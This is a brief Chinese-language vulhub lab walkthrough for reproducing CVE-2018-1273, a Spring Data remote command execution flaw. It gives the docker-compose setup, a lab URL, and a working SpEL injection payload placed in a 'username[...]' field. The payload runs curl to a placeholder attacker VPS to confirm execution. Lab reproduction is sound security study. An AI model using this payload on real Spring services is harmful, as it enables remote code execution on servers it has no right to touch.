【vulhub】Spring Data Rest 远程命令执行漏洞 (CVE-2018-1273)

**

一、启动靶机

**

docker-compose up -d 

**

二、复现

**

URL:http://192.168.150.143:8080/users

【vulhub】Spring Data Rest 远程命令执行漏洞 (CVE-2018-1273)_第1张图片
**

三、发送Payload

**

payload:

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("curl http://vps主机_IP/Hacker")]=

**
【vulhub】Spring Data Rest 远程命令执行漏洞 (CVE-2018-1273)_第2张图片

四、验证

**
【vulhub】Spring Data Rest 远程命令执行漏洞 (CVE-2018-1273)_第3张图片

你可能感兴趣的:(spring,安全,web安全)